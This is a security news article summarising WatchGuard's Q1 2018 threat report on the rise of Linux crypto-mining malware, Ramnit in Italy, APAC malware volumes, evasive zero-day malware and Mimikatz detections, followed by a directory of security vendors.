Crypto-Mining For Cyber Criminals

WatchGuard threat intelligence from Q1 2018 revealed that 98.8 percent of seemingly common Linux/Downloader malware variants were actually designed to deliver a popular Linux-based crypto-currency miner. 

This is just one of several signs that malicious crypto-mining malware is becoming a top tactic among cyber criminals.

“Our Threat Lab team has uncovered multiple indicators that suggest malicious crypto miners are becoming a mainstay in cyber criminals’ arsenals, and will continue to grow more dominant in Q2,” said Corey Nachreiner, CTO at WatchGuard Technologies. 

“While ransomware and other advanced threats are still a major concern, these new crypto-miner attacks illustrate that bad actors are constantly adjusting their tactics to find new ways to take advantage of their victims. 
“In fact, once again in Q1, we saw nearly half of all malware slip past basic signature-based antivirus solutions due to various obfuscation methods. 

“One way every organisation can become more secure against these sophisticated, evasive threats is to deploy defenses enabled with advanced malware prevention.”

Crypto-currency miners are on the rise
Several crypto-currency miners appeared for the first time in WatchGuard’s list of the top 25 malware variants. Firebox appliances have a rule called Linux/Downloader, which catches a variety of Linux “dropper” or “downloader” programs that download and run malware payloads. 

Usually these droppers download a wide range of malware, but in Q1 2018, 98.8 percent of Linux/Downloader instances were trying to download the same popular Linux-based crypto miner. Evidence from Q2 so far indicates that crypto-mining malware will stay on WatchGuard’s top 25 list and may even crack the top 10 by the end of the quarter.

The Ramnit Trojan makes a comeback in Italy
The only malware sample on WatchGuard’s top 10 list that hadn’t appeared in a past report was Ramnit, a Trojan that first emerged in 2010 and had a brief resurgence in 2016. Nearly all (98.9 percent) of WatchGuard’s Ramnit detections came from Italy, indicating a targeted attack campaign. 

Since past versions of Ramnit have targeted banking credentials, WatchGuard advises Italians to take extra precautions with their banking information and enable multi-factor authentication for any financial accounts.

For the first time, APAC reports the highest Malware volume
In past reports, APAC has trailed EMEA and AMER in the number of reported malware hits by a wide margin. In Q1 2018, APAC received the most malware overall. The vast majority of these attacks were Windows-based malware and 98 percent were aimed at India and Singapore.

Nearly half of all malware eludes basic AV solutions
Zero-day malware (a term for malware that is able to evade traditional signature-based AV) accounted for 46 percent of all malware in Q1. This level of zero-day malware suggests that criminals are continuing to use obfuscation techniques to beat traditional AV services, emphasising the importance of behavior-based defenses.

Mimikatz targets the US, skips Asia Pacific
The Mimikatz Windows credential-stealing malware reappeared on WatchGuard’s top 10 malware list after several quarters of absence. Two thirds of the detection of this malware was in the United States and under 0.1 percent of detections were in APAC, possibly due to the complexity of double-byte characters in countries like Japan that use a symbol-based language for passwords.

HelpNetSecurity

You Might Also Read:

Crypto Mining Malware Hits Business:

13 Ways Cyber Criminals Spread Malware:

 

« Cybercrime & Terrorism Threaten South Africa
Blockchain For US Border Security »

Infosecurity Europe
CyberSecurity Jobsite
Perimeter 81

Directory of Suppliers

IT Governance

IT Governance

IT Governance is a leading global provider of information security solutions. Download our free guide and find out how ISO 27001 can help protect your organisation's information.

CYRIN

CYRIN

CYRIN® Cyber Range. Real Tools, Real Attacks, Real Scenarios. See why leading educational institutions and companies in the U.S. have begun to adopt the CYRIN® system.

Syxsense

Syxsense

Syxsense brings together endpoint management and security for greater efficiency and collaboration between IT management and security teams.

MIRACL

MIRACL

MIRACL provides the world’s only single step Multi-Factor Authentication (MFA) which can replace passwords on 100% of mobiles, desktops or even Smart TVs.

BackupVault

BackupVault

BackupVault is a leading provider of automatic cloud backup and critical data protection against ransomware, insider attacks and hackers for businesses and organisations worldwide.

Bob's Business

Bob's Business

Bob's Business adopts a fresh approach to information security awareness and compliance training, delivering key information through the use of short animated movies.

Materna Radar Cyber Security

Materna Radar Cyber Security

Radar Cyber Security is the only European supplier of Managed Detection & Response who provides its services based on inhouse developed technology.

Irdeto

Irdeto

Irdeto is the world leader in digital platform security, protecting platforms and applications for media & entertainment, gaming, connected transport and IoT connected industries.

SafeLogic

SafeLogic

SafeLogic provides strong encryption products for solutions in mobile, server, Cloud, appliance, wearable, and IoT environments that are pursuing compliance to strict regulatory requirements.

Cyberport

Cyberport

Cyberport is focused on facilitating the growth of major technology trends such as FinTech and cybersecurity as well as the emerging technologies of AI, big data and blockchain.

Sprint Networks

Sprint Networks

Sprint Networks is a trusted compliance and risk program advisor which deliver cost-effective technology to reduce enterprise-wide risk.

Cyturus Technologies

Cyturus Technologies

Cyturus Technologies delivers cybersecurity business risk quantification services using our proprietary Adaptive Risk Model (ARM).

Qohash

Qohash

With a focus on data security, Qohash supports security, compliance and optimization use cases enhancing your risk management process.

Core4ce

Core4ce

Core4ce is a mission-oriented company that serves as a trusted partner to the national security community.

HLB System Solutions

HLB System Solutions

HLB System Solutions: Empowering businesses with proactive IT management, consulting, security, and cloud solutions. Seamless tech for growth!

Silobreaker

Silobreaker

Silobreaker is a SaaS platform that enables threat intelligence teams to produce high-quality and relevant intelligence at a faster pace.

turingpoint

turingpoint

turingpoint GmbH is a tech enabled boutique consultancy. It was founded by security experts with a focus on cyber security and software solutions.

Fivecast

Fivecast

Fivecast is enabling a safer world. We help organizations around the world explore masses of data to uncover actionable insights.

OpenZiti

OpenZiti

OpenZiti is the world’s most used and widely integrated open source secure networking platform. OpenZiti provides both zero trust security and overlay networking as pure open source software.

Dream

Dream

Dream is developing an AI platform that enables cyber resilience and protects nations from hostile nation-states cyber attacks.

Cyber Nations

Cyber Nations

Cyber Nations is a global program designed to engage 100,000 African, Caribbean and Canadian learners to be trained in cybersecurity with a path to employment.